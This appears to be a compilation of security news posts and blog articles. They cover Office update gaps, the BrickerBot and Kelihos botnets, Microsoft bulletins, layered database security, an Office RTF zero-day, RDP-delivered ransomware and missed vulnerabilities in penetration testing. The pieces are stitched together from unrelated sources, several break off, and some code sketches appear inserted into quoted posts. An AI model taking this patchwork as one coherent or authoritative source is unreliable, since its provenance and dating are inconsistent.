Update: April 11, 2018

Microsoft Office Click-to-Run updates are not necessarily released on the official Microsoft "Patch Tuesday" dates. For this reason, Click-to-Run Office users may have to wait additional time to receive security updates.

Conclusions and Recommendations

To prevent this problem from happening to you, I recommend that you do the following:

  • Enable Microsoft Update to ensure that you receive updates for software beyond just the core Windows operating system. This switch can be automated using the technique described here: https://msdn.microsoft.com/en-us/aa826676.aspx (see the sketch after this list).
  • If you have a Click-to-Run version of Microsoft Office installed, be aware that it will not receive updates via Microsoft Update.
  • If you have a Click-to-Run version of Microsoft Office and want to ensure timely installation of security updates, manually check for updates rather than relying on the automatic update capability of Click-to-Run.
  • Enterprise customers should refer to Deployment guide for Office 365 ProPlus to ensure that updates for Click-to-Run installations meet their security compliance timeframes.
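For the first recommendation, the opt-in behind that MSDN link amounts to registering the Microsoft Update service with the Windows Update Agent. A minimal sketch using pywin32, run elevated (7971f918-a847-4430-9279-4a52d1efe18d is the well-known Microsoft Update service ID; the flag value 7 combines the allow-pending, allow-online and register-with-AU options):

# Opt a machine in to Microsoft Update via the Windows Update Agent API.
import win32com.client

service_manager = win32com.client.Dispatch("Microsoft.Update.ServiceManager")
service_manager.ClientApplicationID = "opt-in-script"
service_manager.AddService2("7971f918-a847-4430-9279-4a52d1efe18d", 7, "")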

BrickerBot Permanent Denial-of-Service Attack (Update A)

This updated alert is a follow-up to the original alert titled ICS-ALERT-17-102-01A BrickerBot Permanent Denial-of-Service Attack that was published April 12, 2017, on the NCCIC/ICS-CERT web site. ICS-CERT is aware of open-source reports of “BrickerBot” attacks, which exploit hard-coded passwords in IoT devices in order to cause a permanent denial of service (PDoS). This family of botnets, which consists of BrickerBot.1 and BrickerBot.2, was described in a Radware Attack Report.

Kelihos.E

Kelihos.E Botnet – Law Enforcement Takedown

On Monday, April 10th 2017, the US Department of Justice (DOJ) announced a successful operation to take down the Kelihos botnet and arrest the suspected botnet operator.

The Kelihos botnet (and its predecessor Waledec) was one of the most active spamming botnets. Earlier versions of the malware were also involved in delivering trojan horses, stealing user credentials and crypto currency wallets, and in crypto currency mining. The Kelihos botnet was made up of a network of tens of thousands of infected Windows hosts worldwide. It used its own peer-to-peer (P2P) protocol, along with backup DNS domains, to provide resilient command and control (C2) facilities.

The Shadowserver Foundation first alerted the public to the appearance of Kelihos back in 2010 and has supported multiple botnet takedown activities over the years, which historically helped to establish industry codes of conduct for botnet takedowns.

Despite multiple prior takedown attempts in 2011, 2012 and 2013, Kelihos has continued to remain active since 2010 (or since 2008 in its previous incarnation as Waledec). The botnet has delivered large volumes (up to billions) of spam emails every day – including in recent years pump and dump scams, phishing attacks and delivery of ransomware and banking trojans. As such, Kelihos has consistently been one of the main facilitators of email based cybercrime. The alleged operator of the Kelihos botnet (and the Waledec botnet before it) was ranked #7 worst spammer globally by Spamhaus at the time of the operation and has previously been indicted in the US on multiple charges.

The Kelihos.E botnet takedown occurred on Friday April 8th 2017, with 100% of the peer-to-peer network being successfully taken over by law enforcement and C2 traffic redirected to our sinkholes, C2 backend server infrastructure being seized/disrupted, as well as multiple fallback DNS domains being successfully sinkholed under US court order. An arrest was made by Spanish police in Barcelona, Spain.

The Shadowserver Foundation once again participated in the takedown of the Kelihos botnet (in this case variant “Kelihos.E”) by providing the US Federal Bureau of Investigation (FBI) and security researchers at CrowdStrike with infrastructure and support, and gathering data on infected clients for the purposes of victim notification and remediation.

During the first five days of the Kelihos.E takedown operation we observed:

  • 222,792 unique IP addresses connecting to the sinkholes
  • 119,636 unique IP addresses making P2P bootstrap requests to the sinkholes, from 45,983 unique BotIDs
  • 34,542 unique IP addresses involved in “harvest” botnet commands
  • 141,213 unique IP addresses involved in “job” botnet commands

The initial global distribution of unique IP addresses infected with Kelihos.E was:

The initial geographic distribution showed a number of international hot spots:

You can find further statistics on our regularly updated Kelihos.E public statistics site.

The Shadowserver Foundation will continue to work with National CERTs and network owners to remediate the infected computers. For existing Shadowserver report consumers, the Kelihos.E infections will be tagged as “kelihos.e” in the Drone report.

If you do not already receive our free of charge remediation data for your network(s), you can obtain our free nightly reports about compromised and misconfigured devices identified on your networks by signing up for them here.

MS16-037 – Critical: Cumulative Security Update for Internet Explorer (3148531) – Version: 2.0

Severity Rating: Critical
Revision Note: V2.0 (April 11, 2017): Bulletin revised to announce the release of a new Internet Explorer cumulative update (4014661) for CVE-2016-0162. The update adds to the original release to comprehensively address CVE-2016-0162. Microsoft recommends that customers running the affected software install the security update to be fully protected from the vulnerability described in this bulletin. See Microsoft Knowledge Base Article 4014661 for more information.
Summary: This security update resolves vulnerabilities in Internet Explorer. The most severe of the vulnerabilities could allow remote code execution if a user views a specially crafted webpage using Internet Explorer. An attacker who successfully exploited the vulnerabilities could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

MS17-014 – Important: Security Update for Microsoft Office (4013241) – Version: 2.0

Severity Rating: Important
Revision Note: V2.0 (April 11, 2017): To comprehensively address CVE-2017-0027 for Office for Mac 2011 only, Microsoft is releasing security update 3212218. Microsoft recommends that customers running Office for Mac 2011 install update 3212218 to be fully protected from this vulnerability. See Microsoft Knowledge Base Article 3212218 for more information.
Summary: This security update resolves vulnerabilities in Microsoft Office. The most severe of the vulnerabilities could allow remote code execution if a user opens a specially crafted Microsoft Office file. An attacker who successfully exploited the vulnerabilities could run arbitrary code in the context of the current user. Customers whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

MS17-021 – Important: Security Update for Windows DirectShow (4010318) – Version: 2.0

Severity Rating: Important
Revision Note: V2.0 (April 11, 2017): Bulletin revised to announce that the security updates that apply to CVE-2017-0042 for Windows Server 2012 are now available. Customers running Windows Server 2012 should install update 4015548 (Security Only) or 4015551 (Monthly Rollup) to be fully protected from this vulnerability. Customers running other versions of Microsoft Windows do not need to take any further action.
Summary: This security update resolves a vulnerability in Microsoft Windows. The vulnerability could allow an Information Disclosure if Windows DirectShow opens specially crafted media content that is hosted on a malicious website. An attacker who successfully exploited the vulnerability could obtain information to further compromise a target system.

Layered Database Security in the age of Data Breaches

We live in a time of daily breach notifications. One recently affected organization in Germany put out a statement which said: "The incident is not attributable to security deficiencies." and "Human error can also be ruled out." They went on to say that it is "virtually impossible to provide viable protection against organized, highly professional hacking attacks." It's a tough climate we find ourselves in. It just feels too hard or impossible at times. And there's some truth to that. There are way too many potential attack vectors for comfort.

Many breaches occur in ways that make it difficult to pinpoint exactly what might have prevented it. Or, the companies involved hide details about what actually happened or how. In some cases, they lie. They might claim there was some Advanced Persistent Threat on the network when in reality, it was a simple phishing attack where credentials were simply handed over.

In one recent case, a third party vendor apparently uploaded a database file to an unsecured Amazon AWS server. A media outlet covering the story called out that it was not hacking because the data was made so easily available. Numerous checkpoints come to mind that each could have prevented or lessened the damage in this scenario. I’d like to paint a picture of the numerous layers of defense that should be in place to help prevent this type of exposure.

Layer 1: Removing Production Data
The data should have been long removed from the database.
Assuming this is a non-production database (and I sure hope it is), it should have been fully masked before it was even saved as a file. Masking data means completely removing the original sensitive data and replacing it with fake data that looks and acts real. This enables safe use of the database for app development, QA, and testing. Data can be masked as it’s exported from the production database (most secure) or in a secure staging environment after the initial export. Had this step been done, the database could safely be placed on an insecure AWS server with limited security concerns because there’s no real data. An attacker could perhaps use the DB schema or other details to better formulate an attack on the production data, so I’m not recommending posting masked databases publicly, but the risk of data loss is severely limited once the data is masked.

Layer 2: Secure Cloud Server Configuration
The researcher should never have been able to get to the file.
A security researcher poking around the web should never have been able to access this database file. Proper server configuration and access controls should prevent unauthorized access to any files (including databases). In addition to documenting proper security configuration, certain Cloud Security Access Brokers can be used to continuously monitor AWS instances to ensure that server configurations match the corporate guidelines. Any instances of configuration drift can be auto-remediated with these solutions to ensure that humans don’t accidentally misconfigure servers or miss security settings in the course of daily administration.

Layer 3: Apply Database Encryption
Even with access to the database file, the researcher should not have been able to access the data.
At-rest data encryption that is built into the database protects sensitive data against this type of scenario. Even if someone has the database file, if it were encrypted, the file would essentially be useless. An attacker would have to implement an advanced crypto attack which would take enormous resources and time to conduct and is, for all intents and purposes, impractical. Encryption is a no-brainer. Some organizations use disk-layer encryption, which is OK in the event of lost or stolen disk. However, if a database file is moved to an unencrypted volume, it is no longer protected. In-database encryption improves security because the security stays with the file regardless of where it’s moved or exported. The data remains encrypted and inaccessible without the proper encryption keys regardless of where the database file is moved.

Layer 4: Apply Database Administrative Controls
Even with administrative permissions to the database, the researcher should not have been able to access the sensitive data.
I’m not aware of similar capabilities outside of Oracle database, but Oracle Database Vault would have also prevented this breach by implementing access controls within the database. Database Vault effectively segregates roles (enforces Separation of Duties) so that even an attacker with DBA permissions and access to the database file and encryption keys cannot run queries against the sensitive application data within the database because their role does not allow it. This role-based access, enforced within the database, is an extremely effective control to avoid accidental access that may occur throughout the course of daily database administration.

Layer 5: Protect Data Within the Database
Even with full authorization to application data, highly sensitive fields should be protected within the database.
Assuming all of the other layers break down and you have full access to the unencrypted database file and credentials that are authorized to access the sensitive application data, certain highly sensitive fields should be protected via application-tier encryption. Social Security Numbers and Passwords, for example, shouldn’t be stored in plain text. By applying protection for these fields at the app layer, even fully authorized users wouldn’t have access. We all know that passwords should be hashed so that the password field is only useful to the individual user who enters their correct password. But other fields, like SSN, can be encrypted at the app layer to protect against accidental exposure (human error), intentional insider attack, or exposed credentials (perhaps via phishing attack).
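As a purely illustrative sketch of this layer (library choices are mine, not the author's): hash the password so it can only be verified, and encrypt the SSN with a key held by the application, so that even a fully authorized database user only ever sees a hash and ciphertext.

# Application-tier protection of sensitive fields before they reach the database.
import bcrypt
from cryptography.fernet import Fernet

APP_KEY = Fernet.generate_key()       # in practice kept in a KMS/HSM, never stored in the DB

def prepare_user_row(username: str, password: str, ssn: str) -> dict:
    return {
        "username": username,
        "password_hash": bcrypt.hashpw(password.encode(), bcrypt.gensalt()),
        "ssn_encrypted": Fernet(APP_KEY).encrypt(ssn.encode()),
    }

row = prepare_user_row("jdoe", "correct horse battery staple", "078-05-1120")
print(row["password_hash"], row["ssn_encrypted"])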

Maybe the vendor didn’t follow the proper protocols instituted by the organization. Maybe they made a human error; we all make mistakes. But, that’s why a layered approach to database security is critical on any database instances where sensitive production data resides. Security protocols shouldn’t require humans to make the right decisions. They should apply security best practices by default and without option.

Assuming this was a non-production database, any sensitive data should have been fully masked/replaced before it was even made available. And, if it was a production DB, database encryption and access control protections that stay with the database during export or if the database file is moved away from an encrypted volume should have been applied. The data should have been protected before the vendor's analyst ever got his/her hands on it. Oracle Database Vault would have prevented even a DBA-type user from being able to access the sensitive user data that was exposed here. These are not new technologies; they’ve been around for many years with plentiful documentation and industry awareness.

Unfortunately, a few of the early comments I read on this particular event were declarations or warnings about how this proves that cloud is less secure than on-premises deployments. I don’t agree. Many cloud services are configured with security by default and offer far more protection than company-owned data centers. Companies should seek cloud services that enable security by default and that offer layered security controls; more security than their own data centers. It’s more than selecting the right Cloud Service Provider. You also need to choose the right service; one that matches the specific needs (including security needs) of your current project. The top CSPs offer multiple IaaS and/or PaaS options that may meet the basic project requirements. While cloud computing grew popular because it’s easy and low cost, ease-of-use and cost are not always the most important factors when choosing the right cloud service. When sensitive data is involved, security needs to be weighed heavily when making service decisions.

I'll leave you with this. Today's computing landscape is extremely complex and constantly changing. But security controls are evolving to address what has been called the extended enterprise (which includes cloud computing and user mobility among other characteristics). Don't leave security in the hands of humans. And apply security in layers to cover as many potential attack vectors as possible. Enable security by default and apply automated checks to ensure that security configuration guidelines are being followed.

Note: Some of the content above is based on my understanding of Oracle security products (encryption, masking, CASB, etc.). Specific techniques or advantages mentioned may not apply to other vendors’ similar solutions.

Fight firewall sprawl with AlgoSec, Tufin, Skybox suites

New and innovative security tools seem to be emerging all the time, but the frontline defense for just about every network in operation today remains the trusty firewall. They aren’t perfect, but if configured correctly and working as intended, firewalls can do a solid job of blocking threats from entering a network, while restricting unauthorized traffic from leaving.

The problem network administrators face is that as their networks grow, so do the number of firewalls. Large enterprises can find themselves with hundreds or thousands, a mix of old, new and next-gen models, probably from multiple vendors -- sometimes accidentally working against each other. For admins trying to configure firewall rules, the task can quickly become unmanageable.



Acknowledgement of Attacks Leveraging Microsoft Zero-Day

FireEye recently detected malicious Microsoft Office RTF documents that leverage a previously undisclosed vulnerability. This vulnerability allows a malicious actor to execute a Visual Basic script when the user opens a document containing an embedded exploit. FireEye has observed several Office documents exploiting the vulnerability that download and execute malware payloads from different well-known malware families.

FireEye shared the details of the vulnerability with Microsoft and has been coordinating for several weeks public disclosure timed with the release of a patch by Microsoft to address the vulnerability. After recent public disclosure by another company, this blog serves to acknowledge FireEye’s awareness and coverage of these attacks.

FireEye email and network solutions detect the malicious documents as: Malware.Binary.Rtf.

Attack Scenario

The attack involves a threat actor emailing a Microsoft Word document to a targeted user with an embedded OLE2link object. When the user opens the document, winword.exe issues an HTTP request to a remote server to retrieve a malicious .hta file, which appears as a fake RTF file. The Microsoft HTA application loads and executes the malicious script. In both observed documents the malicious script terminated the winword.exe process, downloaded additional payload(s), and loaded a decoy document for the user to see. The original winword.exe process is terminated in order to hide a user prompt generated by the OLE2link.

The vulnerability is bypassing most mitigations; however, as noted above, FireEye email and network products detect the malicious documents. Microsoft Office users are recommended to apply the patch as soon as it is available. 

Acknowledgements

FLARE Team, FireEye Labs Team, FireEye iSIGHT Intelligence, and Microsoft Security Response Center (MSRC).

Smackdown: Office 365 vs. G Suite management

When you choose a productivity platform like Microsoft’s Office 365 or Google’s G Suite, the main focus is on the platform’s functionality: Does it do the job you need?

That’s of course critical, but once you choose a platform, you have to manage it. That’s why management capabilities should be part of your evaluation of a productivity and collaboration platform, not only its user-facing functionality.

You’ve come to the right place for that aspect of choosing between Office 365 and Google G Suite.

Admin console UI. Both the Office 365 and G Suite admin consoles are well designed, providing clean separation of management functions and clear settings labels, so you can quickly move to the settings you want and apply them.



A User-Friendly Interface for Cyber-criminals


Installing malware through the Remote Desktop Protocol is a popular attack method used by many cyber-criminals. Over the past few months Panda Security’s research facility, PandaLabs, has analysed several attacks of this nature.

Once credentials are obtained through a brute force attack on the RDP, the cyber-criminals gain access to the company. Attackers simply execute the corresponding malware automatically to start the encryption.

Recently, however, PandaLabs has noticed more personalised attacks. Analysing this intrusion, we see that the ransomware comes with its own interface, through which it can be configured according to the attacker's preferences, starting with details such as which email address will appear in the ransom note. This customised attack makes it possible to hand-pick the devices the hackers would like to act on.

Advanced attacks we continue to see in this environment require businesses to employ a corporate network security strategy. Preventing zero-day attacks from entering your network is essential, along with efforts to neutralise and block attacks.

Data collected from Panda clients in Europe indicated that Panda Adaptive Defense 360 (AD360) was able to detect and block this particular attack. Timely investment in prevention, detection and response technology, such as AD360, guarantees better protection against new-age threats.

The post A User-Friendly Interface for Cyber-criminals appeared first on CyberSafety.co.za.

Handling Missed Vulnerabilities

(Originally posted at https://nvisium.com/blog/2017/04/05/handling-missed-vulnerabilities/.)

Robin "digininja" Wood wrote this interesting article about the impact of missing vulnerabilities during security assessments. He makes a lot of good points, and the reality is, it's something we all deal with. Robin talks about how missing a vulnerability can be the end of one's career, or at least a large step backward. While this is true, his article only addresses the impact at a micro level. I'd like to expand on that.

As the Managing Consultant of a growing Application Security Consulting practice, this issue takes on a much larger form. We are no longer talking about one person's career. We are talking about an entire organization on which employees' livelihoods rely. Missing a vulnerability at this level can have major consequences that affect a lot more than the offending consultant.

But it's going to happen. It's not a matter of if, but when. So it's important to be prepared when something like this does happen. As someone that has put a good bit of thought into this issue due to my position at nVisium, I've compiled my thoughts on the issue from prevention to reaction. These thoughts cover various hypothetical examples, attempt to identify the root problem, and discuss solutions to help rectify the situation.

Scenarios

The most probable scenario that could lead to missed vulnerabilities is retesting an application that the same consultancy has tested previously. Most good consultancies understand that there is value in rotating consultants for portfolio clients, but there is also risk. No two consultants are the same. Strengths, weaknesses, techniques, and tool sets vary, and with that, the results of their respective assessments. While those who employ this technique see it as a benefit to the client, if the consultant who tested most recently finds something that existed during a previous test but was overlooked, the client is more than likely not going to be thrilled about it, especially if it was something simple.

The spectrum of response here is large, as there is a significant difference between missing something during a black box assessment that gets picked up by an SCA tool and missing something via black box assessment that results in a major breach, but none of the possible outcomes are desirable. This is the scenario that most often leads to the uncomfortable discussion of the client attempting to govern which consultant is allowed to work on their assessments moving forward. I've heard stories of this going as far as direct threats to end all future work unless the consultant was terminated. I can't imagine this is a comfortable position to be in.

While not the most common, the most damaging scenario is when the security assessment is the first step in the implementation of a bug bounty program. If you think it is bad having one of your own consultants find something that another one of your consultants missed, imagine a client having to pay a bug bounty for a vanilla vulnerability that one of your consultants missed. These are resume-generating events.

Framing the Problem

There are four main reasons for encountering these scenarios and others like them: time, effort, aptitude, and methodology. The TEAM acronym was a complete accident, but works out pretty darn perfectly.

Time

Time is the thing that most restricts security assessments, and is the biggest difference between testers and the threats they attempt to replicate. In most cases, testers don't have the same amount of time as the threat, so time becomes a variable that is considered with varying levels of information in an attempt to most accurately represent the threat in a reduced period of time. Let's face it. No one wants to pay enough to truly replicate the threat.

All of these variables come into play during a process called scoping. Scoping is an extremely important part of the assessment planning process, as it is a key component in providing consultants with enough time to complete an engagement. If a consultant is given too little time, then corners are cut, full coverage is not achieved, and we've introduced an opportunity for inconsistency.

There are a lot of things to consider when scoping.

Higher level assets (senior consultants, etc.) are faster than lower level assets (junior consultants, etc.). Low level assets will have to conduct more research on tested components, tools, etc. in order to sufficiently do the job. In fact, so much of what testers do at every level is largely on-the-job self-training. I don't know about you, but I hire based on a candidate's capacity to learn over what they already know. However, there is always a learning curve that must be considered when scoping an engagement in order to ensure full coverage.

Threat replication is a different kind of test than bug hunting. Depending on what kind of consulting the tester specializes in, they're either threat focused or vulnerability focused. To be vulnerability focused is to focus on finding every possible vulnerability in a target. To be threat focused is to focus on replicating a very specific threat and only finding what is needed to accomplish the determined goal of the replicated threat. The focus obviously has a huge impact on the amount of time required to complete the engagement, and on the accuracy with which one can scope the engagement. When focusing on bugs, there are static metrics that can be analyzed to determine the size of the target: lines of code, dynamic pages, APIs, etc. Threat focused testing is much more subjective, as until you encounter something that gets you to the next level, you don't know how long it's going to take to get there.

Budget is often the most important factor in scoping, even though in many cases it is an unknown to the person doing the scoping. Quite often, a client's eyes are bigger than their wallet, and once they get a quote, they begin discussing ways to reduce the price of the engagement. While this is perfectly fine, and most of us would do it if we were in their shoes as well, consultancies have to be very careful not to obligate themselves to a full coverage assessment in a time frame that is unrealistic.

When cost isn't the determining factor that leads to over-obligation, it's client deadlines. You want to help your client, but they need it done by next week and it's easily a three week engagement. Be careful of this pitfall. There are solutions to helping the client without introducing opportunities for inconsistency. Keep reading.

The bottom line is, the consultant performing the engagement must have enough time to complete it in accordance with the terms of the contract. If the contract says "best effort", then pretty much any level of completion meets the standard. Otherwise, the expectation is full coverage for the identified components. Without enough time, you can be sure some other consultant, internal or external, is eventually going to follow up with a full coverage assessment that finds something the previous consultant missed.

Addressing the "time" problem begins with refining the scoping process. This requires good feedback from consultants and careful tracking. Consultancies need to know when something is underscoped or overscoped, and why, and the only way to do this is to gather metrics about the timing of engagements from raw data sources and from the consultants doing the work. When client budget is affecting the scope, consider recommending a "best effort" engagement, or an assessment that focuses on the specific components that are most important to the client. If a client has a hard deadline, consider leveraging more resources over a shorter period of time in order to meet their goal. There are always options, but the bottom line is to prevent the possibility of inconsistencies by making sure consultants have adequate time to meet contract requirements.
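As a concrete illustration of that feedback loop, here is a minimal sketch of tracking scoped versus actual hours per engagement. The field names and the 20% tolerance are assumptions for illustration, not a prescribed process.

# A minimal sketch of scoping feedback: compare scoped hours against the
# hours consultants actually reported and flag drift beyond a tolerance.
from dataclasses import dataclass

@dataclass
class Engagement:
    name: str
    scoped_hours: float   # hours estimated during scoping
    actual_hours: float   # hours reported by the consultant

def scoping_report(engagements, tolerance=0.20):
    """Flag engagements whose actual effort drifted beyond the tolerance."""
    for e in engagements:
        drift = (e.actual_hours - e.scoped_hours) / e.scoped_hours
        if drift > tolerance:
            print(f"{e.name}: underscoped by {drift:.0%} -- revisit estimate inputs")
        elif drift < -tolerance:
            print(f"{e.name}: overscoped by {-drift:.0%} -- margin left on the table")
        else:
            print(f"{e.name}: within tolerance ({drift:+.0%})")

# Hypothetical engagement data for the sake of the example.
scoping_report([
    Engagement("webapp-retest", scoped_hours=40, actual_hours=55),
    Engagement("api-assessment", scoped_hours=80, actual_hours=76),
])

Collected over time, even something this simple shows which kinds of targets, consultants, or assessment types are consistently underscoped, which is exactly the signal needed to refine future estimates.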

Effort

Effort is a personal responsibility. If a consultant doesn't put in the expected quantity of work to complete the job as scoped, but bills for the same, then not only will this introduce the opportunity for inconsistency, but the consultant is essentially stealing from the client on behalf of the consultancy. This is a serious offense with no easy solution. So much of what indicates a person's sustained level of effort comes from maturity and work ethic. Identifying these is something consultancies should do during the candidacy stage of the employment process.

Another aspect of effort is how consultants approach deliverables. It's no secret: most consultants don't enjoy writing deliverables. Regardless, the deliverable is the one thing left with the client when the consultant finishes an engagement. It provides the lasting impression that the client will have of the consultant and, more importantly, the consultancy. However, every so often consultants take shortcuts to reduce the time it takes to create a deliverable. This always leads to a lower quality product and opportunities for inconsistency. Consultants must assume that the next consultant to see this target is going to put the requisite effort into the deliverable.

The bottom line is, report everything. Whether the consultant uses paragraphs, bullets, or tables, if they discovered 30 instances of XSS, they need to report all 30 of them in the deliverable. They shouldn't just say, "We determined this to be systemic, so fix everywhere." That is poor quality consulting. It's OK to say things are systemic and that there may be other instances not found for one reason or another, but if the consultant found 30 instances, they need to pass that information to the client. The client paid for it. Another common deliverable shortcut is grouping vulnerabilities by type without proper delineation. User Enumeration in a login page is very different from User Enumeration in a registration page, and the recommendations for how to remediate these issues are completely different. If a consultant lumps all instances of User Enumeration into one issue and doesn't clearly delineate between the specific issues, then the consultant isn't putting in the required level of effort to prevent inconsistencies with future engagements.
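To make that concrete, here is a minimal sketch of a finding structure that forces per-instance reporting and per-location remediation notes. The class and field names are illustrative assumptions, not the schema of any real reporting tool.

# A minimal sketch: every finding carries its full list of instances, each
# with its own location and remediation, so nothing collapses into
# "systemic, fix everywhere".
from dataclasses import dataclass, field
from typing import List

@dataclass
class Instance:
    location: str        # e.g. "/login", "/register"
    evidence: str        # request/response excerpt, screenshot reference, etc.
    remediation: str     # remediation specific to this location

@dataclass
class Finding:
    title: str           # e.g. "User Enumeration"
    severity: str
    instances: List[Instance] = field(default_factory=list)

    def render(self) -> str:
        lines = [f"{self.title} ({self.severity}) -- {len(self.instances)} instance(s)"]
        for i in self.instances:
            lines.append(f"  * {i.location}: {i.remediation}")
        return "\n".join(lines)

xss = Finding("Reflected XSS", "High", [
    Instance("/search?q=", "payload reflected unencoded", "HTML-encode output in search results"),
    Instance("/profile/name", "stored value rendered raw", "encode on render, validate on input"),
])
print(xss.render())

Whether the deliverable ends up as paragraphs, bullets, or tables, structuring findings this way makes it hard to ship a report that silently drops 28 of the 30 instances the client paid to have found.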

Effort isn't an issue that can be addressed through administrative or technical controls. Effort comes from who someone is, their work ethic, and their level of passion toward the task at hand. Unfortunately, passion and work ethic aren't things that can be taught at this point in life, and if this is the issue, then the only option may be parting ways. This is why it is important to have a good vetting process for employment candidates to ensure that they exhibit the qualities indicative of someone who will provide the desired level of effort.

Aptitude

A lack of aptitude is often mistaken for a lack of effort. The reality is that some people are just more gifted than others, and all consultants can't be held to the same standard. While certainly not always the case, skill level is quite often related to the quantity of experience in the field. It's why we have Junior, Mid-level, Senior, and Principal level consultants. As mentioned previously, a Junior consultant cannot be expected to accomplish as much as a Senior consultant in the same amount of time. The Junior will require more time to research the target components, tools, techniques, etc. required to successfully complete the engagement. While this is a scoping consideration, it's also a staffing consideration. There is a higher margin on low level consultants. They cost less per hour, so they are more profitable on an hourly basis when the rate charged to the client is the same as a consultant senior to them. A stable of capable Junior consultants can be quite profitable, but can also introduce inconsistency.

Depending on the consultancy's strategic vision, there are a couple of approaches to solving the issue of aptitude. Many consultancies will try to avoid the issue altogether by employing nothing but Senior level consultants or above. This is typical in small organizations with a high operational tempo and not enough resources to develop Junior consultants. These consultancies are basically throwing money at the problem. Their margin will be much lower, but they'll be able to maintain a higher operational tempo and incur less risk of testing inconsistencies related to skill. Another approach is a program to develop Junior consultants in an effort to increase margin and reduce the risk of testing inconsistencies over time. A great way to approach Junior consultant development is by pairing them with consultants senior to them on every engagement. That way, they'll have constant leadership and someone they can lean on for mentorship. This allows the consultancy to get through engagements in a shorter time span due to having multiple assets assigned, but the scope of the project should consider the learning curve of the Junior consultant. In many cases, the increased speed of the senior asset will counter the slower speed of the junior asset, reducing the impact on the scoping process.

Regardless of the approach, consultancies should empower their consultants to cross train and knowledge share on a constant basis. Something we've done at nVisium is to conduct bi-monthly lunch-and-learns. These are informal presentations on something related to the field from one consultant to the rest of the team. This serves two purposes. For senior consultants, it is an opportunity to share something new or unknown with junior level consultants. For junior consultants, it is an opportunity to develop professionally on a consistent basis, as each consultant rotates through. An added benefit for juniors is that there are few things that motivate someone to become a subject matter expert on a topic more than committing to presenting that topic to a group of their peers. It is surprisingly effective, and the reason I write articles and present at conferences to this day.

Another thing we do at nVisium is cultivate a highly collaborative environment via tools like Slack. So much so that it rarely feels like consultants are working on engagements alone. It is quite common to see code snippets and theory being tossed around, and more than a handful of people sharing ideas about something encountered on an app only one of them is assigned to. This hive mind approach is not only highly effective in finding the best way forward on specific issues, but provides a great opportunity for Junior consultants to ask questions, receive clarification, and learn from their peers. It also addresses consistency at its core, as these discussions usually result in a public determination of where the organization stands on the issue, which becomes an established standard moving forward. Everyone is involved, so everyone is aware.

Methodology

This is where I see consultants at all levels mess up more than anywhere else. Everyone thinks they're too good for methodology until someone else finds something new while following the methodology on the same application. The testing methodologies we use in Information Security today are proven. They work by laying the framework to maximize the time given to accomplish the task while providing a baseline level of analysis. I've seen consultants blow off methodology, and one of two things happens: they spend all their time chasing phantom vulnerabilities (also known as "rabbit holes" and "red herrings") and fail to achieve full coverage, or they think they have full coverage only to realize they missed multiple vanilla vulnerabilities when someone else tested the same target at a later time. In either case, an opportunity for inconsistency is introduced, because it is not a matter of if someone will follow with proper methodology, it's a matter of when.

Addressing this is about finding a balance between controlling the assessment process and allowing testers to exercise creative freedom. I am a firm believer in not forcing consultants to test in a confined environment by requiring them to use a checklist. Many of today's most critical vulnerabilities exist in business logic. Discovering vulnerabilities in how the application enforces logical controls to business processes requires a creative approach. Forcing consultants to use a checklist robs them of their creativity, reducing the likelihood of them actually testing outside of the items on the checklist. Since logic vulnerabilities are specific to the business process, they can't be checklist items. So while checklist testing is a good way to ensure a higher level of consistency, it leads to a consistent product lacking quality and completeness.

At nVisium we've developed what we call a "testing guide." What makes our guide different from a checklist is that the guide is merely a series of questions about the application. How testers answer the questions is up to them. They can use their own techniques and their own tool set. The idea is that by answering each of the questions within the guide, the tester will have exercised the application in its entirety and maximized the likelihood of identifying all vulnerabilities, including business logic flaws. This guide is not a deliverable, and it's not something that supervisors check for. It's a tool at the disposal of the consultant, and each consultant knows that the others are using it, so the system is self-policing.
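As a rough illustration only (the questions and grouping below are assumptions, not the actual nVisium guide), a question-driven guide can be as simple as a mapping from application areas to open questions, with "coverage" meaning every question has an answer rather than every checklist item being ticked:

# A minimal sketch of a question-driven testing guide. The questions are
# illustrative; testers answer them however they like, with whatever tools
# and techniques they prefer.
testing_guide = {
    "Authentication": [
        "How does the application identify a returning user?",
        "What happens when credentials are wrong, locked, or expired?",
    ],
    "Authorization": [
        "Can one user's identifiers be swapped for another's in any request?",
        "Which business actions are gated only on the client side?",
    ],
    "Business Logic": [
        "What multi-step workflows exist, and can steps be skipped or reordered?",
        "Where does the application trust client-supplied prices, quantities, or state?",
    ],
}

def unanswered(answers: dict) -> list:
    """Return the guide questions the tester has not yet answered."""
    return [q for qs in testing_guide.values() for q in qs if q not in answers]

# Free-form answers recorded by the tester; coverage = no unanswered questions.
print(unanswered({"How does the application identify a returning user?": "JWT in cookie"}))

Because the questions are about the application rather than about specific payloads or tools, they leave room for the creative, business-logic-focused testing that a rigid checklist tends to squeeze out.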

The Inevitable

Even with all of this in place, someone is going to miss something. And when they do, the organization must conduct damage control. Damage control measures are largely going to be determined by how the client reacts to the issue. It is purely reactionary at this point for all parties. However, thinking through possible scenarios as a staff and "wargaming" these situations will better prepare the team for the inevitable.

I'm a firm believer in owning your mistakes. I have way more respect for people who make mistakes and own them than I do for folks who claim they never make any. Do you know what you call someone who never seems to be at fault for anything because they don't make mistakes? Dishonest. These individuals and the organizations they represent are immediately tagged as untrustworthy. We're in an industry where trust is the cornerstone of everything we do. Our clients entrust us with their intellectual property; the heart and soul of their businesses. Their livelihood. If we can't be trusted, we won't stay in business very long. Organizations and individuals alike must own their mistakes.

After owning the mistake, the organization needs to make it right. Once again, this depends on what the issue is, but remember that the issue is not in a vacuum. So someone missed a small issue during a small assessment for a small client. One might feel inclined to let it go. Don't forget that our industry is small, and word travels fast. There's far too much risk in not doing the right thing here folks.

The organization must accept the fact that sometimes making it right won't be enough. Clients pay consultancies a lot of money and expect a quality product. If the consultancy fails to deliver, the client has every right to find someone else that will, and the consultancy shouldn't be surprised if they do. In a perfect world, clients would understand our line of work and the difficulty in ensuring 100% consistency, but you don't need me to tell you this isn't a perfect world.

Wrapping Up

So it's going to happen, and someone is going to be dealing with the fallout. Chances are it won't be comfortable, but if the organization has implemented controls to reduce the frequency, and prepared itself for occasions where the controls fail, it will be equipped to limit the damage and ultimately live to test another day.

Doing it wrong, or “us and them”

